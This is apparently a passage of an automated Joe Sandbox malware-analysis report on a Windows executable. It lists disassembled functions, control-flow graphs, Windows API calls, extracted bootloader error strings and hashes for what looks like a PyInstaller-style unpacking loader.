                                                                                                                                                                                                                                                                    control_flow_graph 407 7ff7c2661600-7ff7c2661611 408 7ff7c2661637-7ff7c2661651 call 7ff7c26645b0 407->408 409 7ff7c2661613-7ff7c266161c call 7ff7c2661050 407->409 414 7ff7c2661653-7ff7c2661681 call 7ff7c2674f78 call 7ff7c2662910 408->414 415 7ff7c2661682-7ff7c266169c call 7ff7c26645b0 408->415 416 7ff7c266162e-7ff7c2661636 409->416 417 7ff7c266161e-7ff7c2661629 call 7ff7c2662710 409->417 424 7ff7c266169e-7ff7c26616b3 call 7ff7c2662710 415->424 425 7ff7c26616b8-7ff7c26616cf call 7ff7c2670744 415->425 417->416 431 7ff7c2661821-7ff7c2661824 call 7ff7c26700bc 424->431 432 7ff7c26616f9-7ff7c26616fd 425->432 433 7ff7c26616d1-7ff7c26616f4 call 7ff7c2674f78 call 7ff7c2662910 425->433 441 7ff7c2661829-7ff7c266183b 431->441 435 7ff7c2661717-7ff7c2661737 call 7ff7c2674fb4 432->435 436 7ff7c26616ff-7ff7c266170b call 7ff7c2661210 432->436 446 7ff7c2661819-7ff7c266181c call 7ff7c26700bc 433->446 447 7ff7c2661739-7ff7c266175c call 7ff7c2674f78 call 7ff7c2662910 435->447 448 7ff7c2661761-7ff7c266176c 435->448 443 7ff7c2661710-7ff7c2661712 436->443 443->446 446->431 460 7ff7c266180f-7ff7c2661814 447->460 449 7ff7c2661802-7ff7c266180a call 7ff7c2674fa0 448->449 450 7ff7c2661772-7ff7c2661777 448->450 449->460 453 7ff7c2661780-7ff7c26617a2 call 7ff7c267040c 450->453 462 7ff7c26617da-7ff7c26617e6 call 7ff7c2674f78 453->462 463 7ff7c26617a4-7ff7c26617bc call 7ff7c2670b4c 453->463 460->446 468 7ff7c26617ed-7ff7c26617f8 call 7ff7c2662910 462->468 469 7ff7c26617be-7ff7c26617c1 463->469 470 7ff7c26617c5-7ff7c26617d8 call 7ff7c2674f78 463->470 475 7ff7c26617fd 468->475 469->453 472 7ff7c26617c3 469->472 470->468 472->475 475->449
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                                    • Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                                                                                                                                                                                    • Instruction ID: 7127c338d8a0e7dddd06712ffc889ba19b6cb79ba9e7794e021fcc1681b29202
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C751AE61B08A4392EA10BF25A4101A9A362BF85BB4FC44531EECC67F92DFBCE555C374
                                                                                                                                                                                                                                                                    Function 00007FF7C2668850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(?,?,00000000,00007FF7C2663CBB), ref: 00007FF7C26688F4
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7C2663CBB), ref: 00007FF7C26688FA
                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7C2663CBB), ref: 00007FF7C266893C
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2668A20: GetEnvironmentVariableW.KERNEL32(00007FF7C266388E), ref: 00007FF7C2668A57
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2668A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7C2668A79
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C26782A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C26782C1
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662810: MessageBoxW.USER32 ref: 00007FF7C26628EA
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                    • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                                    • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                                                    • Instruction ID: b98af2371c34f127faefef7cd65751ae17b00dd306a37cea4fda17f4c67935cc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1418411B19A4280EA10FF35A8592B992B3AF95BA0FC04131ED8D67F96DEBCE504C375
                                                                                                                                                                                                                                                                    Function 00007FF7C2661210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 599 7ff7c2661210-7ff7c266126d call 7ff7c266bdf0 602 7ff7c2661297-7ff7c26612af call 7ff7c2674fb4 599->602 603 7ff7c266126f-7ff7c2661296 call 7ff7c2662710 599->603 608 7ff7c26612d4-7ff7c26612e4 call 7ff7c2674fb4 602->608 609 7ff7c26612b1-7ff7c26612cf call 7ff7c2674f78 call 7ff7c2662910 602->609 615 7ff7c2661309-7ff7c266131b 608->615 616 7ff7c26612e6-7ff7c2661304 call 7ff7c2674f78 call 7ff7c2662910 608->616 621 7ff7c2661439-7ff7c266144e call 7ff7c266bad0 call 7ff7c2674fa0 * 2 609->621 619 7ff7c2661320-7ff7c2661345 call 7ff7c267040c 615->619 616->621 627 7ff7c266134b-7ff7c2661355 call 7ff7c2670180 619->627 628 7ff7c2661431 619->628 636 7ff7c2661453-7ff7c266146d 621->636 627->628 635 7ff7c266135b-7ff7c2661367 627->635 628->621 637 7ff7c2661370-7ff7c2661398 call 7ff7c266a230 635->637 640 7ff7c266139a-7ff7c266139d 637->640 641 7ff7c2661416-7ff7c266142c call 7ff7c2662710 637->641 642 7ff7c266139f-7ff7c26613a9 640->642 643 7ff7c2661411 640->643 641->628 645 7ff7c26613ab-7ff7c26613b9 call 7ff7c2670b4c 642->645 646 7ff7c26613d4-7ff7c26613d7 642->646 643->641 652 7ff7c26613be-7ff7c26613c1 645->652 647 7ff7c26613ea-7ff7c26613ef 646->647 648 7ff7c26613d9-7ff7c26613e7 call 7ff7c2689ea0 646->648 647->637 651 7ff7c26613f5-7ff7c26613f8 647->651 648->647 654 7ff7c266140c-7ff7c266140f 651->654 655 7ff7c26613fa-7ff7c26613fd 651->655 656 7ff7c26613c3-7ff7c26613cd call 7ff7c2670180 652->656 657 7ff7c26613cf-7ff7c26613d2 652->657 654->628 655->641 658 7ff7c26613ff-7ff7c2661407 655->658 656->647 656->657 657->641 658->619
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                    • Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                                                                    • Instruction ID: 013edc6fe4290a9722309ce62581d231d2c44df3182eafa82d29c95cdecacf6e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F151B622A08A4281EA60BF15A4503B9A2A2FF85BA4FC44135ED8D67FD5DFBCD541C734
                                                                                                                                                                                                                                                                    Function 00007FF7C267ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7C267F11A,?,?,-00000018,00007FF7C267ADC3,?,?,?,00007FF7C267ACBA,?,?,?,00007FF7C2675FAE), ref: 00007FF7C267EEFC
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7C267F11A,?,?,-00000018,00007FF7C267ADC3,?,?,?,00007FF7C267ACBA,?,?,?,00007FF7C2675FAE), ref: 00007FF7C267EF08
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                    • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                    • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                                    • Instruction ID: 1d3a926de201ee0d4d687f0001a63605ba65e79d33c843646ef8ef2c80162d34
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A141C321B19A0281FA15FF16A804575A392BF44BB0FD84539DD9DA7B94EFBCE408C370
                                                                                                                                                                                                                                                                    Function 00007FF7C26636B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF7C2663804), ref: 00007FF7C26636E1
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C2663804), ref: 00007FF7C26636EB
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662C9E
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662D63
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662C50: MessageBoxW.USER32 ref: 00007FF7C2662D99
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                    • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                                    • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                    • Instruction ID: 4133b74280d9d2b8651899db4c27cb38a9961711c748b40e9f9c750c72edb290
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70217461B1864281FA20BF20E8543B59262BF94768FC00136D9DDA3FD5EEBCE515C338
                                                                                                                                                                                                                                                                    Function 00007FF7C267BACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 744 7ff7c267bacc-7ff7c267baf2 745 7ff7c267bb0d-7ff7c267bb11 744->745 746 7ff7c267baf4-7ff7c267bb08 call 7ff7c2674f58 call 7ff7c2674f78 744->746 748 7ff7c267bee7-7ff7c267bef3 call 7ff7c2674f58 call 7ff7c2674f78 745->748 749 7ff7c267bb17-7ff7c267bb1e 745->749 764 7ff7c267befe 746->764 766 7ff7c267bef9 call 7ff7c267a950 748->766 749->748 751 7ff7c267bb24-7ff7c267bb52 749->751 751->748 754 7ff7c267bb58-7ff7c267bb5f 751->754 758 7ff7c267bb78-7ff7c267bb7b 754->758 759 7ff7c267bb61-7ff7c267bb73 call 7ff7c2674f58 call 7ff7c2674f78 754->759 762 7ff7c267bee3-7ff7c267bee5 758->762 763 7ff7c267bb81-7ff7c267bb87 758->763 759->766 767 7ff7c267bf01-7ff7c267bf18 762->767 763->762 768 7ff7c267bb8d-7ff7c267bb90 763->768 764->767 766->764 768->759 771 7ff7c267bb92-7ff7c267bbb7 768->771 773 7ff7c267bbea-7ff7c267bbf1 771->773 774 7ff7c267bbb9-7ff7c267bbbb 771->774 775 7ff7c267bbc6-7ff7c267bbdd call 7ff7c2674f58 call 7ff7c2674f78 call 7ff7c267a950 773->775 776 7ff7c267bbf3-7ff7c267bc1b call 7ff7c267d66c call 7ff7c267a9b8 * 2 773->776 777 7ff7c267bbbd-7ff7c267bbc4 774->777 778 7ff7c267bbe2-7ff7c267bbe8 774->778 805 7ff7c267bd70 775->805 807 7ff7c267bc1d-7ff7c267bc33 call 7ff7c2674f78 call 7ff7c2674f58 776->807 808 7ff7c267bc38-7ff7c267bc63 call 7ff7c267c2f4 776->808 777->775 777->778 779 7ff7c267bc68-7ff7c267bc7f 778->779 782 7ff7c267bcfa-7ff7c267bd04 call 7ff7c268398c 779->782 783 7ff7c267bc81-7ff7c267bc89 779->783 796 7ff7c267bd8e 782->796 797 7ff7c267bd0a-7ff7c267bd1f 782->797 783->782 786 7ff7c267bc8b-7ff7c267bc8d 783->786 786->782 790 7ff7c267bc8f-7ff7c267bca5 786->790 790->782 794 7ff7c267bca7-7ff7c267bcb3 790->794 794->782 801 7ff7c267bcb5-7ff7c267bcb7 794->801 803 7ff7c267bd93-7ff7c267bdb3 ReadFile 796->803 797->796 799 7ff7c267bd21-7ff7c267bd33 GetConsoleMode 797->799 799->796 804 7ff7c267bd35-7ff7c267bd3d 799->804 801->782 806 7ff7c267bcb9-7ff7c267bcd1 801->806 809 7ff7c267bead-7ff7c267beb6 GetLastError 803->809 810 7ff7c267bdb9-7ff7c267bdc1 803->810 804->803 812 7ff7c267bd3f-7ff7c267bd61 ReadConsoleW 804->812 815 7ff7c267bd73-7ff7c267bd7d call 7ff7c267a9b8 805->815 806->782 816 7ff7c267bcd3-7ff7c267bcdf 806->816 807->805 808->779 813 7ff7c267beb8-7ff7c267bece call 7ff7c2674f78 call 7ff7c2674f58 809->813 814 7ff7c267bed3-7ff7c267bed6 809->814 810->809 818 7ff7c267bdc7 810->818 820 7ff7c267bd63 GetLastError 812->820 821 7ff7c267bd82-7ff7c267bd8c 812->821 813->805 825 7ff7c267bedc-7ff7c267bede 814->825 826 7ff7c267bd69-7ff7c267bd6b call 7ff7c2674eec 814->826 815->767 816->782 824 7ff7c267bce1-7ff7c267bce3 816->824 828 7ff7c267bdce-7ff7c267bde3 818->828 820->826 821->828 824->782 833 7ff7c267bce5-7ff7c267bcf5 824->833 825->815 826->805 828->815 829 7ff7c267bde5-7ff7c267bdf0 828->829 835 7ff7c267be17-7ff7c267be1f 829->835 836 7ff7c267bdf2-7ff7c267be0b call 7ff7c267b6e4 829->836 833->782 840 7ff7c267be9b-7ff7c267bea8 call 7ff7c267b524 835->840 841 7ff7c267be21-7ff7c267be33 835->841 844 7ff7c267be10-7ff7c267be12 836->844 840->844 845 7ff7c267be8e-7ff7c267be96 841->845 846 7ff7c267be35 841->846 844->815 845->815 848 7ff7c267be3a-7ff7c267be41 846->848 849 7ff7c267be7d-7ff7c267be88 848->849 850 7ff7c267be43-7ff7c267be47 848->850 849->845 851 7ff7c267be49-7ff7c267be50 850->851 852 7ff7c267be63 850->852 851->852 853 7ff7c267be52-7ff7c267be56 851->853 854 7ff7c267be69-7ff7c267be79 852->854 853->852 855 7ff7c267be58-7ff7c267be61 853->855 854->848 856 7ff7c267be7b 854->856 855->854 856->845
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                                                    • Instruction ID: 50657baf3df4cdfbdea6d67b2f69fd4d24220e9b3d3ca57c05f04a0d927bd32c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16C1832290868681E651BF25A4442BDE762EB81FA0FD54131EACE23BD1DFFCE855C770
                                                                                                                                                                                                                                                                    Function 00007FF7C2668760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 995526605-0
                                                                                                                                                                                                                                                                    • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                                                    • Instruction ID: 3c2436c4bfcfe2d5826adfb53a900b1cea3a4164123b4c81f2bbafaf3c3eaf20
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17212621A0864281DA10AF65B454139E7B2FB857B0F900235D6ED53FE5DFBCD445C764
                                                                                                                                                                                                                                                                    Function 00007FF7C26690E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2668760: GetCurrentProcess.KERNEL32 ref: 00007FF7C2668780
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2668760: OpenProcessToken.ADVAPI32 ref: 00007FF7C2668793
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2668760: GetTokenInformation.KERNELBASE ref: 00007FF7C26687B8
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2668760: GetLastError.KERNEL32 ref: 00007FF7C26687C2
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2668760: GetTokenInformation.KERNELBASE ref: 00007FF7C2668802
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2668760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7C266881E
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2668760: CloseHandle.KERNEL32 ref: 00007FF7C2668836
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF7C2663C55), ref: 00007FF7C266916C
                                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF7C2663C55), ref: 00007FF7C2669175
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1720329401.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720292059.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720417432.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720455917.00007FF7C26A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1720520244.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
